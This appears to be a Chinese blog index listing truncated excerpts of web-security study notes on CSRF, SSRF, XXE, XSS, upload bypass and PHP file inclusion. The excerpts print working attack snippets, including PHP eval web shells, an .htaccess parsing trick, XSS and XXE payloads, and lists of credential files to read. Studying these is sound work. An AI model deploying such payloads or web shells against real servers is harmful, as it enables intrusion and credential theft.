web安全-CSRF(跨站请求伪造)
攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等
1.利用将构造好的POC(例如一张图片,点击后直接跳转到支付),利用你目前的登录状态(你的账户余额),完成恶意操作(完成支付)
以下xxx.com可以改为恶意网站
GET方式构造例如:
1<img src='xxx.com'>
点击图片则跳转
也可以用其他标签达到跳转效果,例如<a>``<iframe>等
POST方式构造12345<form actiom='xxx.com' method='post'><input type='hidden' name='变量1' value='变量值1'><input type='hidden' name='变量1' ...
web安全-SSRF(服务器端请求伪造)
1.漏洞函数(php)file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile()接下来详细介绍其中几种函数:
curl_exec()
curl_exec函数用于执行指定的cURL会话
123456789101112131415<?php if (isset($_POST['url'])){ $link = $_POST['url']; $curlobj = curl_init();// 创建新的 cURL 资源 curl_setopt($curlobj, CURLOPT_POST, 0); curl_setopt($curlobj,CURLOPT_URL,$link); curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);// 设置 URL 和相应的选项 $result=curl_exec($curlobj);// 抓取 URL 并把它传递给浏览器 curl_close($c ...
web安全-XXE(XML外部实体注入)
1.XML文档
XML文档结构包括XML声明、DTD:文档类型定义(可选)、文档元素
XML文档可以引用外部文档中的DTD
2.XML文档中的DTD实体类似于在DTD中定义变量,方便引用
分为一般实体和参数实体,而每种实体类型内还存在内部实体和外部实体两种类型
一般实体用&符号引用DTD中定义的一般实体
内部实体
12345<!DOCTYPE test [<!ENTITY a "YTM"><!ENTITY b "666">]><test>&a;&b;</test>
解析后结果为YTM666
外部实体
DTD中定义时加上SYSTEM作为引用外部实体的标志
12345<?xml version="1.0"?><!DOCTYPE test [<!ENTITY a SYSTEM "http://yantm666.github.io/password">]><author> ...
web安全-XSS(跨站脚本攻击)
1.反射型用户如果点击了类似于这样的攻击型url,就会执行反射型XSS攻击,并造成危害,这也就是它作为反射型的原因,且只会执行一次
1127.0.0.1/xss.php?id=<script>alert("hello")</script>
2.储存型存储型一般会在博客评论,用户评论,留言板等等这些会把数据存储在数据库中的地方注入恶意代码
作为用户来访问此网页时触发
3.DOM型详解:https://www.cnblogs.com/mysticbinary/p/12542695.html
重定向至京东页面:
12345<script>window.onload=function(){var link=document.getElementsByTagName('a');for(j=0;j<=link.length;j++){link[j].href="https://www.jd.com";}}</script>
4.一些常见绕过大 ...
web安全-文件上传
前端检测查看网络,被拦截时是否发包,若有前端检测,可以进行抓包改包绕过或者禁用js上传
MIME类型检测修改请求包中的Content-Type,改为图片的类型image/jpeg、image/png、image/gif等是否能通过
黑名单绕过后缀名绕过尝试.phtml、.pht、.php3、.php4、.php5等后缀
变种木马(.phtml、.pht文件).phtml、.pht文件可以这样写
短标签:<?=@eval($_POST['shell']);?>
HTML标签形式:<script language="php"> eval($_POST['shell']);echo phpinfo();</script>
.htaccess文件上传后,所在目录中名字包含png的文件将被当作php代码解析。(只支持apache服务器)
1<FilesMatch "png"> setHander application/x-httpd-ph ...
web安全-PHP文件包含
1.任意文件读取利用文件包含漏洞,将服务器本地文件包含进页面
系统敏感文件或者配置文件windows:
123456C:\boot.ini //查看系统版本C:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件C:\windows\repair\sam //存储Windows系统初次安装的密码C:\ProgramFiles\mysql\my.ini //Mysql配置C:\ProgramFiles\mysql\data\mysql\user.MYD //MySQL root密码C:\windows\php.ini //php配置信息
Linux/Unix
1234567/etc/password //账户信息/etc/shadow //账户密码信息/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置/usr/local/app/php5/lib/php.in ...